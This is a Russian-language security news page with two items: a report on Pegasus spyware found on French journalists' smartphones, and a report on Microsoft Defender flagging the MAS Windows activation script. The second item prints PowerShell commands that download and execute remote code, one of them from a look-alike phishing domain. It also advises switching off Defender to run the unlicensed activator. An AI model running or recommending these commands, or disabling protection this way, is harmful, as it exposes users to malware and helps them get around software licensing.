Шпион Pegasus был найден на смартфонах французских журналистов

Шпион Pegasus был найден на смартфонах французских журналистов

Шпион Pegasus был найден на смартфонах французских журналистов

Сотрудники французских разведывательных служб подтвердили, что знаменитая шпионская программа Pegasus была обнаружена на смартфонах местных журналистов, включая руководство федерального телеканала France 24.

Впервые за изучение операций Pegasus взялись одновременно и официальные органы, и независимые исследователи. Судя по всему, клиентов израильской компании NSO Group, разрабатывающей Pegasus, очень интересовали представители СМИ Франции.

Также кибершпионы взяли в оборот французских журналистов, проводящих расследования. Например, Pegasus «подхватили» сотрудники издания Mediapart.

По данным некоммерческой организации Forbidden Stories, как минимум 180 журналистов по всему миру могли попасть в поле интересов клиентов NSO Group. А источники во France 24 заявили, что издание крайне озадачено слежкой за своими сотрудниками.

«Мы ошеломлены и раздосадованы тем, что наши журналисты могли стать объектом слежки. Мы не намерены оставлять это просто так, определённо будут юридические последствия», — передаёт The Guardian слова представителей France 24.

Власти Франции тоже были удивлены, когда телефонные номера Эмманюэля Макрона и ещё 14 министров просочились в одной из утечек. Позже прошла информация о возможной заинтересованности Марокко в подобном использовании шпиона Pegasus.

Напомним, что в июле стало известно о новой версии шпиона Pegasus, которая запросто могла взломать актуальную на тот момент iOS 14.6. А в конце того же месяца глава NSO Group порадовал своей позицией: соблюдающим закон пользователям не стоит опасаться слежки.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru